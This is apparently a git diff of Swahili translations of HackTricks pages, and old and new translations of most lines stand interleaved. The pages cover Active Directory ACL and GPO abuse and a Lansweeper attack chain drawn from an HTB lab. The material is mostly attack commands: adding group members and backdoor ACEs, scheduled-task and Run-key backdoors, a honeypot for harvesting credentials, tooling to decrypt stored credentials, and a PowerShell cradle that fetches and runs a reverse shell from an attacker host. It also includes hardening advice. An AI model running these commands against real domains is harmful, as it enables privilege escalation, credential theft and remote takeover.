Kwa ruhusa hii, washambuliaji wanaweza kubadilisha uanachama wa kikundi, kama kujiongeza wao wenyewe au watumiaji wengine katika vikundi maalum. Mchakato huu unahusisha kuunda credential object, kuitumia kuongeza au kuondoa watumiaji kutoka kwa kikundi, na kuthibitisha mabadiliko ya uanachama kwa kutumia amri za PowerShell.
Kwa ruhusa hii, wadukuzi wanaweza kubadili uanachama wa group, kama vile kujiongezea wenyewe au watumiaji wengine katika vikundi maalum. Mchakato huu unajumuisha kuunda credential object, kuitumia kuongeza au kuondoa watumiaji kutoka kwenye group, na kuthibitisha mabadiliko ya uanachama kwa amri za PowerShell.
```bash
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
@ -111,7 +111,9 @@ Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'use
```
## **WriteDACL + WriteOwner**
Kumiliki kitu cha AD na kuwa na ruhusa za `WriteDACL` juu yake kunamwezesha mshambuliaji kujipa ruhusa za `GenericAll` kwa kitu hicho. Hii inafikiwa kupitia manipulisho ya ADSI, ikiruhusu udhibiti kamili wa kitu hicho na uwezo wa kubadilisha uanachama wake wa vikundi. Hata hivyo, kunakuwapo vikwazo wakati wa kujaribu kuchukua faida ya ruhusa hizi kwa kutumia cmdlets za Active Directory `Set-Acl` / `Get-Acl`.
Kumiliki kitu cha AD na kuwa na ruhusa za `WriteDACL` juu yake kunamwezesha attacker kujipa ruhusa za `GenericAll` juu ya kitu hicho.
Hii inafikiwa kupitia ADSI manipulation, ikiruhusu udhibiti kamili wa kitu hicho na uwezo wa kubadilisha uanachama wake wa vikundi. Hata hivyo, kuna vikwazo vinavyopo unapo jaribu exploit ruhusa hizi kwa kutumia Active Directory module's `Set-Acl` / `Get-Acl` cmdlets.
```bash
$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
$IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless")).Translate([System.Security.Principal.SecurityIdentifier])
@ -119,64 +121,64 @@ $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityRe
$ADSI.psbase.ObjectSecurity.SetAccessRule($ACE)
$ADSI.psbase.commitchanges()
```
## **Ukurudishaji kwenye Domain (DCSync)**
## **Kurudishana kwenye Domain (DCSync)**
Shambulio la DCSync linatumia ruhusa maalum za replication kwenye domain ili kujiga Domain Controller na kusanifisha data, ikijumuisha nywila za watumiaji. Mbinu hii yenye nguvu inahitaji ruhusa kama `DS-Replication-Get-Changes`, kuruhusu washambuliaji kutoa taarifa nyeti kutoka mazingira ya AD bila kupata moja kwa moja kwa Domain Controller. [**Learn more about the DCSync attack here.**](../dcsync.md)
Shambulio la DCSync linatumia ruhusa maalum za replication kwenye domain ili kujigania kuwa Domain Controller na kusawazisha data, pamoja na kredenshiali za watumiaji. Mbinu hii yenye nguvu inahitaji ruhusa kama `DS-Replication-Get-Changes`, ikiruhusu washambuliaji kutoa taarifa nyeti kutoka kwa mazingira ya AD bila kupata ufikiaji wa moja kwa moja kwenye Domain Controller. [**Jifunze zaidi kuhusu shambulio la DCSync hapa.**](../dcsync.md)
## Utoaji wa GPO <a href="#gpo-delegation" id="gpo-delegation"></a>
## Ugawaji wa GPO <a href="#gpo-delegation" id="gpo-delegation"></a>
### Utoaji wa GPO
### Ugawaji wa GPO
Ufikiaji uliotolewa kusimamia Group Policy Objects (GPOs) unaweza kuleta hatari kubwa za usalama. Kwa mfano, ikiwa mtumiaji kama `offense\spotless` amepewa haki za usimamizi wa GPO, anaweza kuwa na vibali kama **WriteProperty**, **WriteDacl**, na **WriteOwner**. Ruhusa hizi zinaweza kutumika vibaya kwa madhumuni mabaya, kama ilivyobainishwa kwa kutumia PowerView: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
Ufikiaji uliogawiwa wa kusimamia Group Policy Objects (GPOs) unaweza kuleta hatari kubwa za usalama. Kwa mfano, ikiwa mtumiaji kama `offense\spotless` amepewa haki za kusimamia GPO, anaweza kuwa na vibali kama **WriteProperty**, **WriteDacl**, na **WriteOwner**. Vibali hivi vinaweza kutumika vibaya kwa madhumuni mabaya, kama inavyobainika kwa kutumia PowerView: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
### Kukusanya Ruhusa za GPO
### Kuorodhesha Vibali vya GPO
Ili kubaini GPO zilizopangwa vibaya, cmdlets za PowerSploit zinaweza kuunganishwa pamoja. Hii inaruhusu kugundua GPO ambazo mtumiaji fulani ana ruhusa za kusimamia: `powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
Ili kubaini GPOs zilizo na usanidi mbaya, cmdlets za PowerSploit zinaweza kuunganishwa pamoja. Hii inaruhusu kugundua GPOs ambazo mtumiaji maalum ana ruhusa za kusimamia: `powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
**Kompyuta ambazo Sera Fulani Imetumika**: Inawezekana kubaini ni kompyuta zipi GPO maalum inawahusu, kusaidia kuelewa wigo wa athari zinazoweza kutokea. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
**Kompyuta zilizo na Sera Imetumika**: Inawezekana kubaini kompyuta ambazo GPO fulani inatumika, kusaidia kuelewa wigo wa athari zinazowezekana. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
**Sera Zilizotekelezwa kwa Kompyuta Fulani**: Ili kuona sera gani zimewekwa kwa kompyuta fulani, amri kama `Get-DomainGPO` zinaweza kutumika.
**Sera Zilizotumika kwa Kompyuta Fulani**: Ili kuona ni sera gani zilizotumika kwa kompyuta fulani, amri kama `Get-DomainGPO` zinaweza kutumika.
**OUs Ambazo Sera Fulani Imewagusa**: Kutambua organizational units (OUs) zilizoathiriwa na sera fulani kunaweza kufanywa kwa kutumia `Get-DomainOU`
**OUs zilizo na Sera Iliyotumika**: Kutambua vitengo vya shirika (OUs) vilivyoathiriwa na sera fulani kunaweza kufanywa kwa kutumia `Get-DomainOU`.
Unaweza pia kutumia chombo [**GPOHound**](https://github.com/cogiceo/GPOHound) kuorodhesha GPO na kutafuta matatizo ndani yao.
Unaweza pia kutumia zana [**GPOHound**](https://github.com/cogiceo/GPOHound) kuorodhesha GPOs na kupata matatizo ndani yao.
### Kutumia vibaya GPO - New-GPOImmediateTask
### Kutumia Vibaya GPO - New-GPOImmediateTask
GPO zilizopangwa vibaya zinaweza kutumiwa kuendesha code, kwa mfano, kwa kuunda immediate scheduled task. Hii inaweza kutumika kuongeza mtumiaji kwenye local administrators group kwenye mashine zilizoathirika, hivyo kuinua vibali kwa kiasi kikubwa:
GPOs zilizo sanidiwa vibaya zinaweza kutumiwa kuendesha code, kwa mfano, kwa kuunda kazi ya ratiba inayotekelezwa mara moja. Hii inaweza kutumika kuongeza mtumiaji kwenye kikundi cha local administrators kwenye mashine zilizoathiriwa, na hivyo kuongeza kwa kiasi kikubwa viwango vya ruhusa:
```bash
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
```
### GroupPolicy module - Abuse GPO
Module ya GroupPolicy, ikiwa imewekwa, inaruhusu kuunda na kuunganisha GPOs mpya, na kuweka mapendeleo, kama vile registry values, ili kutekeleza backdoors kwenye kompyuta zilizoathiriwa. Njia hii inahitaji GPO kusasishwa na mtumiaji aingie kwenye kompyuta kwa ajili ya utekelezaji:
The GroupPolicy module, ikiwa imewekwa, inaruhusu uundaji na kuunganisha GPOs mpya, pamoja na kuweka mapendeleo kama registry values ili kutekeleza backdoors kwenye kompyuta zilizoathiriwa. Mbinu hii inahitaji GPO kusasishwa na mtumiaji kuingia kwenye kompyuta ili utekelezaji ufanyike:
```bash
New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io"
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString
```
### SharpGPOAbuse - Abuse GPO
SharpGPOAbuse inatoa mbinu ya kutumia vibaya GPO zilizopo kwa kuongeza kazi au kubadilisha mipangilio bila hitaji la kuunda GPO mpya. Zana hii inahitaji marekebisho ya GPO zilizopo au kutumia zana za RSAT kuunda mpya kabla ya kutekeleza mabadiliko:
SharpGPOAbuse inatoa njia ya abuse GPOs zilizopo kwa kuongeza tasks au kubadilisha settings bila hitaji la kuunda GPOs mpya. Zana hii inahitaji uhariri wa GPOs zilizopo au kutumia RSAT tools kuunda GPOs mpya kabla ya kutekeleza mabadiliko:
```bash
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc-2\software\pivot.exe" --GPOName "PowerShell Logging"
```
### Lazimisha Sasisho la Sera
### Leteza Sasisho la Sera
Sasisho za GPO kwa kawaida hufanyika takriban kila dakika 90. Ili kuharakisha mchakato huu, hasa baada ya kutekeleza mabadiliko, amri `gpupdate /force` inaweza kutumika kwenye kompyuta lengwa ili kulazimisha sasisho la sera mara moja. Amri hii inahakikisha kwamba mabadiliko yoyote kwa GPOs yanatekelezwa bila kusubiri mzunguko ujao wa sasisho la kiotomatiki.
Sasisho za GPO kwa kawaida hufanyika takriban kila dakika 90. Ili kuharakisha mchakato huu, hasa baada ya kutekeleza mabadiliko, agizo `gpupdate /force` linaweza kutumika kwenye kompyuta ya lengo ili kulazimisha sasisho la sera mara moja. Agizo hili linahakikisha kuwa marekebisho yoyote ya GPOs yatekelezwa bila kusubiri mzunguko wa sasisho la kiotomatiki.
### Ndani ya Mfumo
Baada ya kuchunguza Majukumu yaliyopangwa kwa GPO fulani, kama `Misconfigured Policy`, inaweza kuthibitishwa kwamba majukumu kama `evilTask` yameongezwa. Majukumu haya huundwa kupitia scripti au zana za command-line zinazolenga kubadilisha tabia ya mfumo au kuinua ruhusa.
Ukikagua Scheduled Tasks za GPO fulani, kama `Misconfigured Policy`, unaweza kuthibitisha kuongezwa kwa kazi kama `evilTask`. Kazi hizi zimeundwa kupitia scripts au zana za command-line zinazolenga kubadilisha tabia za mfumo au kuongeza uwezo wa kusimamisha haki.
Muundo wa kazi, kama inavyoonyeshwa katika faili ya usanidi ya XML iliyotengenezwa na `New-GPOImmediateTask`, unaeleza maelezo maalum ya kazi iliyopangwa - ikiwa ni pamoja na amri iliyotakiwa kutekelezwa na vichocheo vyake. Faili hii inaonyesha jinsi Majukumu yaliyopangwa yanavyofafanuliwa na kusimamiwa ndani ya GPOs, ikitoa njia ya kutekeleza amri au scripti yoyote kama sehemu ya utekelezaji wa sera.
Muundo wa kazi, kama vile unaoonyeshwa katika faili ya usanidi ya XML iliyotengenezwa na `New-GPOImmediateTask`, unaelezea maelezo maalum ya kazi iliyopangwa - ikiwa ni pamoja na amri itakayotekelezwa na vichocheo vyake. Faili hii inaonyesha jinsi kazi zilizopangwa zinasainiwa na kusimamiwa ndani ya GPOs, ikitoa njia ya kutekeleza amri au scripts yoyote kama sehemu ya utekelezaji wa sera.
### Watumiaji na Vikundi
GPOs pia huruhusu udhibiti wa uanachama wa watumiaji na vikundi kwenye mifumo lengwa. Kwa kuhariri faili za sera za Users and Groups moja kwa moja, washambuliaji wanaweza kuongeza watumiaji kwenye vikundi vyenye mamlaka, kama kikundi cha eneo cha `administrators`. Hii inatokea kupitia ugawaji (delegation) wa ruhusa za usimamizi wa GPO, ambao unaruhusu mabadiliko ya faili za sera ili kujumuisha watumiaji wapya au kubadilisha uanachama wa vikundi.
GPOs pia huruhusu udhibiti wa uanachama wa watumiaji na vikundi kwenye mifumo ya lengo. Kwa kuhariri faili za sera za Watumiaji na Vikundi moja kwa moja, wadukuzi wanaweza kuongeza watumiaji kwenye vikundi vyenye mamlaka, kama vile kundi la ndani la `administrators`. Hii inawezekana kupitia uteuzi wa ruhusa za usimamizi wa GPO, ambayo inaruhusu mabadiliko ya faili za sera ili kujumuisha watumiaji wapya au kubadilisha uanachama wa vikundi.
Faili ya usanidi ya XML kwa Users and Groups inaeleza jinsi mabadiliko haya yanavyotekelezwa. Kwa kuongeza rekodi kwenye faili hii, watumiaji maalum wanaweza kupewa ruhusa zilizoongezwa kwenye mifumo iliyoharibika. Njia hii inatoa njia ya moja kwa moja ya kuinua viwango vya ruhusa kupitia udanganyifu wa GPO.
Faili ya usanidi ya XML kwa Watumiaji na Vikundi inaelezea jinsi mabadiliko haya yanavyotekelezwa. Kwa kuongeza rekodi kwenye faili hii, watumiaji maalum wanaweza kupewa haki zilizoinuliwa kwa mifumo yote iliyohusishwa. Njia hii inatoa njia ya moja kwa moja ya kuinua hadhi kupitia uhariri wa GPO.
Zaidi ya hayo, mbinu nyingine za kutekeleza msimbo au kudumisha upatikanaji, kama kutumia scripti za kuingia/kuondoka (logon/logoff), kubadilisha vitufe vya registry kwa ajili ya autoruns, kusakinisha programu kupitia faili za .msi, au kuhariri usanidi wa services, pia zinaweza kuzingatiwa. Mbinu hizi zinatoa njia mbalimbali za kudumisha upatikanaji na kudhibiti mifumo lengwa kupitia matumizi mabaya ya GPOs.
Zaidi ya hayo, mbinu nyingine za kutekeleza msimbo au kudumisha udumishaji, kama vile kutumia logon/logoff scripts, kurekebisha registry keys kwa ajili ya autoruns, kusakinisha software kupitia .msi files, au kuhariri service configurations, pia zinaweza kuzingatiwa. Mbinu hizi zinatoa njia mbalimbali za kudumisha upatikanaji na kudhibiti mifumo ya lengo kupitia unyonyaji wa GPOs.
## Marejeo

82
src/windows-hardening/active-directory-methodology/lansweeper-security.md
View File

@ -1,28 +1,28 @@
# Lansweeper Matumizi Mabaya: Credential Harvesting, Secrets Decryption, and Deployment RCE
# Matumizi mabaya ya Lansweeper: Credential Harvesting, Secrets Decryption, and Deployment RCE
{{#include ../../banners/hacktricks-training.md}}
Lansweeper ni jukwaa la ugundaji na inventory la IT linalotumika kwa kawaida kwenye Windows na limeunganishwa na Active Directory. Credentials zilizowekwa katika Lansweeper zimetumika na scanning engines zake kuthibitisha kwenye assets kupitia protocols kama SSH, SMB/WMI na WinRM. Misconfigurations mara nyingi huruhusu:
Lansweeper ni jukwaa la kugundua na kuhifadhi kumbukumbu za mali za IT ambalo mara nyingi huwekwa kwenye Windows na kuunganishwa na Active Directory. Credentials zilizosanifiwa ndani ya Lansweeper zinatumiwa na scanning engines zake kuthibitisha kwenye assets kupitia itifaki kama SSH, SMB/WMI na WinRM. Mipangilio mibaya mara nyingi inawezesha:
- Kukamata Credential kwa kuelekeza Scanning Target kwenye mwenyeji unaodhibitiwa na mshambuliaji (honeypot)
- Matumizi mabaya ya AD ACLs zilizofunguliwa na vikundi vinavyohusiana na Lansweeper ili kupata ufikiaji wa mbali
- Credential interception kwa kupeleka tena scanning target kwa host inayodhibitiwa na mshambuliaji (honeypot)
- Abuse of AD ACLs zinazofichuliwa na vikundi vinavyohusiana na Lansweeper ili kupata ufikiaji wa mbali
- On-host decryption ya Lansweeper-configured secrets (connection strings and stored scanning credentials)
- Code execution kwenye managed endpoints kupitia kipengele cha Deployment (mara nyingi running as SYSTEM)
- Code execution kwenye managed endpoints kupitia kipengele cha Deployment (mara nyingi kinaendesha kama SYSTEM)
Ukurasa huu unatoa muhtasari wa workflows za mshambuliaji na amri za kutumia tabia hizi wakati wa engagements.
Ukurasa huu unatoa muhtasari wa workflows za mshambuliaji na amri za vitendo za kutumia tabia hizi wakati wa engagements.
## 1) Harvest scanning credentials via honeypot (SSH example)
Idea: unda Scanning Target inayorejea kwenye host yako na uifunganye na Scanning Credentials zilizopo. Wakati scan inapoendeshwa, Lansweeper itajaribu kuthibitisha kwa kutumia credentials hizo, na honeypot yako itazikamata.
Wazo: unda Scanning Target inayowelekeza kwa host yako na uoanishe Scanning Credentials zilizopo nayo. Wakati scan itakapokimbia, Lansweeper itajaribu kuthibitisha kwa kutumia hizo credentials, na honeypot yako itaziwakamata.
Steps overview (web UI):
Muhtasari wa hatua (web UI):
- Scanning → Scanning Targets → Add Scanning Target
- Type: IP Range (or Single IP) = your VPN IP
- Configure SSH port to something reachable (e.g., 2022 if 22 is blocked)
- Disable schedule and plan to trigger manually
- Scanning → Scanning Credentials → ensure Linux/SSH creds exist; map them to the new target (enable all as needed)
- Click “Scan now” on the target
- Run an SSH honeypot and retrieve the attempted username/password
- Type: IP Range (or Single IP) = anwani yako ya VPN
- Sanidi port ya SSH kuwa nambari inayoweza kufikiwa (mf., 2022 ikiwa 22 imezuiwa)
- Zima ratiba na panga kuitisha kwa mkono
- Scanning → Scanning Credentials → hakikisha Linux/SSH creds zipo; ramana hizo kwa target mpya (wezeshwa zote inapohitajika)
- Bonyeza “Scan now” kwenye target
- Endesha SSH honeypot na pokea jina la mtumiaji/nenosiri lililotumika kujaribu kuingia
Example with sshesame:
```yaml
@ -47,14 +47,14 @@ netexec ldap inventory.sweep.vl -u svc_inventory_lnx -p '<password>'
netexec winrm inventory.sweep.vl -u svc_inventory_lnx -p '<password>'
```
Vidokezo
- Inafanya kazi kwa njia sawa kwa itifaki nyingine wakati unaweza kulazimisha scanner kuunganishwa na listener yako (SMB/WinRM honeypots, n.k.). SSH mara nyingi ni rahisi zaidi.
- Scanners wengi hujitambulisha kwa client banners za kipekee (mf., RebexSSH) na zitajaribu amri zisizo hatari (uname, whoami, n.k.).
- Inafanya kazi kwa njia sawa kwa protocols nyingine wakati unaweza ku-coerce the scanner kwa listener wako (SMB/WinRM honeypots, etc.). SSH mara nyingi ni rahisi zaidi.
- Scanners wengi hujitambulisha kwa distinct client banners (e.g., RebexSSH) na watajaribu benign commands (uname, whoami, etc.).
## 2) AD ACL abuse: pata ufikia wa mbali kwa kujiongeza mwenyewe kwenye app-admin group
## 2) AD ACL abuse: pata ufikiaji wa mbali kwa kujiongeza kwenye app-admin group
Tumia BloodHound kuorodhesha effective rights kutoka kwa akaunti iliyovamiwa. Matokeo ya kawaida ni kikundi maalum cha scanner au app (mf., “Lansweeper Discovery”) kinachoshikilia GenericAll juu ya kikundi lenye mamlaka (mf., “Lansweeper Admins”). Ikiwa kikundi lenye mamlaka pia ni mjumbe wa “Remote Management Users”, WinRM inapatikana mara tu tunapojiongeza.
Tumia BloodHound kuorodhesha haki za ufanisi (effective rights) kutoka kwa akaunti iliyoharibiwa. Ugunduzi wa kawaida ni scanner- au app-specific group (e.g., “Lansweeper Discovery”) inayoshikilia GenericAll juu ya group iliyo na hadhi (e.g., “Lansweeper Admins”). Ikiwa group iliyo na hadhi pia ni mwanachama wa “Remote Management Users”, WinRM inapatikana mara tu tunapojiongeza.
Collection examples:
Mifano ya collection:
```bash
# NetExec collection with LDAP
netexec ldap inventory.sweep.vl -u svc_inventory_lnx -p '<password>' --bloodhound -c All --dns-server <DC_IP>
@ -62,7 +62,7 @@ netexec ldap inventory.sweep.vl -u svc_inventory_lnx -p '<password>' --bloodhoun
# RustHound-CE collection (zip for BH CE import)
rusthound-ce --domain sweep.vl -u svc_inventory_lnx -p '<password>' -c All --zip
```
Exploit GenericAll kwenye kundi kwa kutumia BloodyAD (Linux):
Exploit GenericAll kwenye kundi na BloodyAD (Linux):
```bash
# Add our user into the target group
bloodyAD --host inventory.sweep.vl -d sweep.vl -u svc_inventory_lnx -p '<password>' \
@ -75,20 +75,20 @@ Kisha pata interactive shell:
```bash
evil-winrm -i inventory.sweep.vl -u svc_inventory_lnx -p '<password>'
```
Kidokezo: Operesheni za Kerberos zinategemea muda. Ikiwa unapokea KRB_AP_ERR_SKEW, linganisha saa na DC kwanza:
Kidokezo: Operesheni za Kerberos zinategemea muda. Ikiwa unapata KRB_AP_ERR_SKEW, linganisha saa na DC kwanza:
```bash
sudo ntpdate <dc-fqdn-or-ip> # or rdate -n <dc-ip>
```
## 3) Fungua siri zilizowekwa na Lansweeper kwenye mwenyeji
## 3) Decrypt Lansweeper-configured secrets on the host
Kwenye server ya Lansweeper, tovuti ya ASP.NET kawaida huhifadhi encrypted connection string na symmetric key inayotumika na application. Kwa upatikanaji wa ndani unaofaa, unaweza dekripti connection string ya DB kisha kutoa credentials zilizohifadhiwa za scanning.
Kwenye seva ya Lansweeper, tovuti ya ASP.NET kwa kawaida huhifadhi encrypted connection string na symmetric key zinazotumiwa na application. Ukiwa na access ya ndani inayofaa, unaweza decrypt DB connection string kisha kutoa stored scanning credentials.
Typical locations:
- Web config: `C:\Program Files (x86)\Lansweeper\Website\web.config`
- `<connectionStrings configProtectionProvider="DataProtectionConfigurationProvider">``<EncryptedData>…`
- Application key: `C:\Program Files (x86)\Lansweeper\Key\Encryption.txt`
Tumia SharpLansweeperDecrypt kuendesha decryption na kutupa credentials zilizohifadhiwa:
Use SharpLansweeperDecrypt to automate decryption and dumping of stored creds:
```powershell
# From a WinRM session or interactive shell on the Lansweeper host
# PowerShell variant
@ -99,26 +99,26 @@ powershell -ExecutionPolicy Bypass -File C:\ProgramData\LansweeperDecrypt.ps1
# - Connect to Lansweeper DB
# - Decrypt stored scanning credentials and print them in cleartext
```
Matokeo yanayotarajiwa yanajumuisha DB connection details na plaintext scanning credentials kama vile Windows na Linux accounts zinazotumika katika estate. Hizi mara nyingi zina elevated local rights kwenye domain hosts:
Matokeo yanayotarajiwa yanajumuisha DB connection details na plaintext scanning credentials kama vile akaunti za Windows na Linux zinazotumika katika estate nzima. Hizi mara nyingi zina elevated local rights kwenye domain hosts:
```text
Inventory Windows SWEEP\svc_inventory_win <StrongPassword!>
Inventory Linux svc_inventory_lnx <StrongPassword!>
```
Tumia recovered Windows scanning creds kwa ufikiaji wa ruhusa za juu:
Tumia Windows scanning creds zilizopatikana kwa upatikanaji wa ruhusa za juu:
```bash
netexec winrm inventory.sweep.vl -u svc_inventory_win -p '<StrongPassword!>'
# Typically local admin on the Lansweeper-managed host; often Administrators on DCs/servers
```
## 4) Lansweeper Deployment → SYSTEM RCE
Kama mwanachama wa “Lansweeper Admins”, UI ya wavuti inaonyesha Deployment na Configuration. Chini ya Deployment → Deployment packages, unaweza kuunda packages ambazo zinaendesha amri yoyote kwenye vifaa vilivyolengwa. Utekelezaji hufanywa na service ya Lansweeper kwa ruhusa za juu, ukileta code execution kama NT AUTHORITY\SYSTEM kwenye host iliyochaguliwa.
Kama mwanachama wa “Lansweeper Admins”, UI ya wavuti inaonyesha Deployment na Configuration. Chini ya Deployment → Deployment packages, unaweza kuunda packages ambazo zinaendesha amri za aina yoyote kwenye assets zilizolengwa. Utekelezaji unafanywa na huduma ya Lansweeper kwa vibali vya juu, ukitoa utekelezaji wa msimbo kama NT AUTHORITY\SYSTEM kwenye host iliyochaguliwa.
High-level steps:
Hatua za juu:
- Tengeneza package mpya ya Deployment inayotekeleza PowerShell au cmd one-liner (reverse shell, add-user, n.k.).
- Lenga kifaa kinachotakiwa (mf., DC/host ambapo Lansweeper inaendesha) kisha bonyeza Deploy/Run now.
- Lenga asset unayotaka (kwa mfano, DC/host ambapo Lansweeper inakimbia) na bonyeza Deploy/Run now.
- Pata shell yako kama SYSTEM.
Example payloads (PowerShell):
Mifano ya payloads (PowerShell):
```powershell
# Simple test
powershell -nop -w hidden -c "whoami > C:\Windows\Temp\ls_whoami.txt"
@ -127,21 +127,21 @@ powershell -nop -w hidden -c "whoami > C:\Windows\Temp\ls_whoami.txt"
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker>/rs.ps1')"
```
OPSEC
- Vitendo vya deployment huwa vinasikika na kuacha logs ndani ya Lansweeper na Windows event logs. Tumia kwa tahadhari.
- Vitendo vya Deployment husababisha kelele na huacha logs katika Lansweeper na Windows event logs. Tumia kwa uangalifu.
## Ugunduzi na kuimarisha usalama
## Utambuzi na kuimarisha
- Zuia au ondoa anonymous SMB enumerations. Simamia RID cycling na ufikiaji usio wa kawaida wa Lansweeper shares.
- Egress controls: zuia au punguza sana outbound SSH/SMB/WinRM kutoka scanner hosts. Taarifu kwa ports zisizo za kawaida (mf., 2022) na client banners zisizo za kawaida kama Rebex.
- Linda `Website\\web.config` na `Key\\Encryption.txt`. Hamisha siri (externalize) ndani ya vault na zungusha (rotate) pale zinapofichuliwa. Fikiria service accounts zenye ruhusa ndogo na gMSA pale inapowezekana.
- AD monitoring: toa tahadhari kuhusu mabadiliko kwa makundi yanayohusiana na Lansweeper (mf., “Lansweeper Admins”, “Remote Management Users”) na kwa mabadiliko ya ACL yanayotoa GenericAll/Write uanachama kwa makundi yenye ruhusa za juu.
- Fanya ukaguzi wa utengenezaji/mabadiliko/utekelezaji wa Deployment packages; toa tahadhari kwa packages zinazozindua cmd.exe/powershell.exe au kuanzisha muunganisho wa outbound usiotarajiwa.
- Zuia au ondoa uorodheshaji wa SMB wa anonymous. Fuatilia RID cycling na upatikanaji usio wa kawaida wa Lansweeper shares.
- Egress controls: zuia au punguza kwa ukali outbound SSH/SMB/WinRM kutoka scanner hosts. Toa onyo kwa ports zisizo za kawaida (e.g., 2022) na client banners zisizo za kawaida kama Rebex.
- Linda `Website\\web.config` na `Key\\Encryption.txt`. Hamisha siri kwenye vault na uzibadilishe (rotate) pale zitakapofichuka. Fikiria service accounts zenye privileges za chini na gMSA pale inapofaa.
- AD monitoring: toa onyo kwa mabadiliko ya vikundi vinavyohusiana na Lansweeper (e.g., “Lansweeper Admins”, “Remote Management Users”) na kwa mabadiliko ya ACL yanayotoa GenericAll/Write membership kwa vikundi vilivyo na haki za juu.
- Audit Deployment package creations/changes/executions; toa onyo kwa packages zinazowasha cmd.exe/powershell.exe au muunganisho wa outbound usiotarajiwa.
## Mada zinazohusiana
- SMB/LSA/SAMR enumeration na RID cycling
- Kerberos password spraying na mambo ya kuzingatia kuhusu clock skew
- BloodHound path analysis ya application-admin groups
- WinRM usage na lateral movement
- SMB/LSA/SAMR enumeration and RID cycling
- Kerberos password spraying and clock skew considerations
- BloodHound path analysis of application-admin groups
- WinRM usage and lateral movement
## References
- [HTB: Sweep — Abusing Lansweeper Scanning, AD ACLs, and Secrets to Own a DC (0xdf)](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html)